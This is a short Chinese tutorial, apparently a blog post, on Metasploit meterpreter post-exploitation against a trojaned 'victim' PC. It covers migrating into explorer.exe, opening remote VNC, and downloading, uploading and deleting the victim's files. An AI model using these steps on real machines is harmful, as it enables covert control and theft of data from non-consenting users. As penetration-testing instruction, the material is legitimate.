MSF對木馬的利用
0x0
上一篇文章,我將受害者的電腦(ip:192.168.0.254)注入了木馬,並且確定了shell,現在讓我們看下怎麼在meterpreter下有更多的操作。
0x1
講下進程注入
找到桌面進程explorer.exe,記住他的PID 是4672
使用命令migrate 4672
注入成功!!
0x02
遠程桌面的開啟。
使用命令 run vnc
0x03
文件管理功能
download 下載文件 ***在攻擊機生成木馬的目錄下***
edit 編輯文件
cat 查看文件
mkdir 建立文件夾
upload 上傳文件
rmdir 刪除文件夾
打開c盤,然後使用ls就可以看到c盤的目錄。在meterpreter下的功能強大過在shell下的功能。以上的命令可以去試下。